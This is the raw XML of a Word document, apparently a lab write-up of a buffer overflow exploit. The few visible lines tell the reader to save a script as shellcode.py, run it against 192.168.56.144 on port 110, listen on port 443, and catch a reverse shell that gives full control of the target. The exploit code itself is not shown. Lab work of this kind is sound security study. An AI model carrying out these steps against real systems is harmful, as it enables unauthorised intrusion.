    <w:p w14:paraId="0480455F" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D01EA8">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D8924E3" wp14:editId="6158DF0C">
            <wp:extent cx="5943600" cy="2016125"/>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5943600" cy="2016125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F2137F" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001500A8">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2971AD3F" wp14:editId="09101438">
            <wp:extent cx="5943600" cy="2745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5740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE2BBA4" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Save the script as shellcode.py, run it in the next step to get the reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11454784" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Send the exploit to the target machine by running the command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D54AA0" w14:textId="77777777" w:rsidR="000F062F" w:rsidRPr="00D01EA8" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D01EA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Python2 shellcode.py 192.168.56.144 110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769CB463" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:r w:rsidRPr="001B5B22">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48E46303" wp14:editId="7CB74C8B">
            <wp:extent cx="5943600" cy="32004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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3200400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C1391E" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:r w:rsidRPr="009669F6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F006443" wp14:editId="6D132A3D">
            <wp:extent cx="5943600" cy="1027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7430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B9172E" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F"/>
    <w:p w14:paraId="5EBB0D1C" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:r>
        <w:t xml:space="preserve">Listening at the port 443 and wait for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>shell.We</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> finally get the reverse shell, it means we have a full control of the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F2DD5D" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:r w:rsidRPr="001B5B22">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13486671" wp14:editId="5B8EAF54">
            <wp:extent cx="5943600" cy="236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8550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D62D354" w14:textId="77777777" w:rsidR="008803B5" w:rsidRDefault="008803B5"/>
    <w:sectPr w:rsidR="00880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7208"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C45C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83922"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2B74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9118F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BD02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A5177"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="47BC4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E97354"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7D2689B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7944680A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1652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E56337"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="001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54883">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="945773354">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="645276934">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="379787738">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1743403435">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="556820907">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="592737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2F"/>
    <w:rsid w:val="000F062F"/>
    <w:rsid w:val="008803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CA8E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F477942F-9591-49F6-9DF9-1D729887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6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62F"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000F06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Buf22</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{397DAF1C-1475-4035-BACD-90DCC446D4E8}</b:Guid>
    <b:Title>Buffer Overflow Attack</b:Title>
    <b:ProductionCompany>Imperva</b:ProductionCompany>
    <b:YearAccessed>2022</b:YearAccessed>
    <b:MonthAccessed>12</b:MonthAccessed>
    <b:DayAccessed>12</b:DayAccessed>
    <b:URL>https://www.imperva.com/learn/application-security/buffer-overflow/</b:URL>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
</b:Sources>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{B96A3FDF-9EE4-4846-9FE4-466DD0E7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771</Words>
  <Characters>4395</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>36</Lines>
  <Paragraphs>10</Paragraphs>
  <ScaleCrop>false</ScaleCrop>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MBONABUCYA</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>James MBONABUCYA</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-12-15T00:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-12-15T00:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>